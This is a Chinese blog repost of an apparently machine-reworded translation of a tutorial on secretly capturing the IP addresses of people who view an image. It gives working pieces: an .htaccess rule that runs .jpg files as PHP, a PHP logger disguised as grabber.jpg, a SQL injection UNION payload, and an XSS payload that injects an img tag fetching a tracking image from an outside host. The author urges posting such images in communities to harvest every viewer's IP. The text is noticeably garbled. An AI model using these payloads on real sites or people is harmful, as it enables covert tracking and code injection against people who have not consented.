首页 » 网站建设 » php制造显示ip图片技巧_若何经由进程一张照片来获取ip地址

php制造显示ip图片技巧_若何经由进程一张照片来获取ip地址

访客 2024-10-31 0

扫一扫用手机浏览

文章目录 [+]

本日早上起床之后,我看到一篇关于“利用sql注入语句获取ip地址”的文章,对此我很感兴趣,就仔细阅读了一下,在读完这篇文章之后,我有了一个新的想法:通过对htaccess的利用,实现用一张照片获取他人的ip地址

在本教程中,我们将学习如何用一张照片来盗取ip地址。
我的想法是通过修正.htaccess文件,将jpg文件当作php文件来解析。

php制造显示ip图片技巧_若何经由进程一张照片来获取ip地址

下面便是我们须要向.htaccess中添加的代码:

php制造显示ip图片技巧_若何经由进程一张照片来获取ip地址
(图片来自网络侵删)

AddHandlerapplication/x-httpd-php5.jpg

然后将下面的代码复制到记事本中,命名为grabber.jpg

<?php$fh=fopen('ip_list.txt','a');fwrite($fh,$_SERVER['REMOTE_ADDR']."");fclose($fh);$im=imagecreatefromjpeg("n00b.png");header('Content-Type:image/jpeg');imagejpeg($im);imagedestroy($im);?>

将grabber.jpg的权限设置为755,然后再找一张照片,将其命名为n00b.png,接着放到与grabber.jpg相同的目录之中。

就这样,统统事情就绪了。
当别人浏览grabber.jpg这张照片的时候,他的ip地址就会被记录下来。

(译者注:须要把这些东西上传至我们的个人网站空间中)

POC:

(译者注:作者这里贴了一张可获取ip的演示照片,为了大家的隐私,我没有将其贴出,读者可自行去作者博客查看)

至此,我们的照片已经可以开始事情了。

接着我还想解释一下如何利用SQLi来获取ip地址。
实在利用照片来盗取ip地址十分快捷,我们没有情由去利用SQLi这种方法,但是为了让读者获取到更多的知识,我还是解释一下吧:

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' union select 1,0x3c696d67207372633d22687474703a2f2f6c65657474696d652e6e65742f6964696f74735f746573745f6c61622f696d61676569702f7472796d652e6a7067223e,3#

现在,再说一下如何利用xss来获取ip地址:

http://leettime.net/xsslab1/chalg1.php?name=<imgsrc="http://leettime.net/idiots_test_lab/imageip/tryme.jpg">&submit=Search

好了,便是这些了。

我们可以用这个技巧做许多有趣的事情,事实上大部分社区都许可我们发布一些照片,以是我们可以用这个方法去获取所有访问到我们照片的人的ip地址。

感激您的阅读,Happy Hacking!

原文:http://securityidiots.com/Web-Pentest/Tricks/Grab-IP-Address-Using-Image.htmlwatcher编译

标签:

相关文章

微信第三方登录便捷与安全的完美融合

社交平台已成为人们日常生活中不可或缺的一部分。微信作为我国最受欢迎的社交软件之一,拥有庞大的用户群体。为了方便用户在不同平台间切换...

网站建设 2025-02-18 阅读0 评论0

广东高速代码表解码高速公路管理智慧

高速公路作为国家交通动脉,连接着城市与城市,承载着巨大的物流和人流。广东作为我国经济大省,高速公路网络密布,交通流量巨大。为了更好...

网站建设 2025-02-18 阅读0 评论0